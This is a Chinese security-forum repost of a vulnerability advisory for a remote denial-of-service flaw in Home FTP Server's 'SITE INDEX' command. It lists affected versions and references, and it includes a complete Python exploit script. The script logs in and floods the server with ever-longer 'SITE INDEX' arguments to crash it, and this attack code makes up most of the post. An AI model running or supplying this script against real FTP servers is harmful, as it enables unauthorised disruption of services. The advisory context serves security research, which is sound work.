Board logo

标题: Home FTP Server 'SITE INDEX'命令远程拒绝服务漏洞 [打印本页]

作者: zclzhao    时间: 2009-11-20 15:03     标题: Home FTP Server 'SITE INDEX'命令远程拒绝服务漏洞

影响版本:
Home Ftp Server Home Ftp Server 1.10.1 .139
Home Ftp Server Home Ftp Server 1.10 .138
Home Ftp Server Home Ftp Server 1.0.7 b45
Home Ftp Server Home Ftp Server 1.4.5 Build 84
Home Ftp Server Home Ftp Server 1.3.4.93
漏洞描述:
Bugraq ID: 37033

Home FTP Server是一款FTP服务程序。
Home FTP Server不正确处理"SITE INDEX"命令,远程攻击者可以利用漏洞对服务程序进行拒绝服务攻击。
用户需要验证通过才能触发此漏洞。
<*参考
zhangmc[at]mail.ustc.edu.cn
http://www.securityfocus.com/archive/1/507893
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string="a"*30
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
for i in range(1,30):
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r
for i in range(1,20):
sock.send("SITE INDEX "+ test_string*i +"\r\n")
print "[-] "+ ("SITE INDEX "+ test_string +"\r\n")
r=sock.recv(1024)
print "[+] "+ r
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.exit(0);

SEBUG安全建议:
目前没有详细解决方案提供:
http://downstairs.dnsalias.net/homeftpserver.html




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2